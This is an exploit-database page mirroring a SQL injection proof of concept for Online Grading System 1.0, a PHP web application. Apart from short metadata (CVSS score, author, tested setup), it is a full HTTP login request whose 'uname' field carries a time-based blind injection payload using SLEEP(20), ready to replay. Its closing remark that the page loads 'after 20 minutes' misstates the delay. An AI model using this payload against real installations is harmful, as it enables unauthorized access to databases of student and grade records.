Advertisement






Online Grading System 1.0 SQL Injection

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2021-01-30
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010199

Below is a copy:

Online Grading System 1.0 SQL Injection
# Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection
# Date: 2021-01-28
# Exploit Author: Ruchi Tiwari
# Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

---------------------------------------------------------------------------------

#parameter Vulnerable: uname
# Injected Request
POST /onlinegradingsystem/admin/login.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/onlinegradingsystem/admin/login.php
Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us
Upgrade-Insecure-Requests: 1

uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin=

#Application will load after 20 minutes.
--------------------------------------------------------------------------------------------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum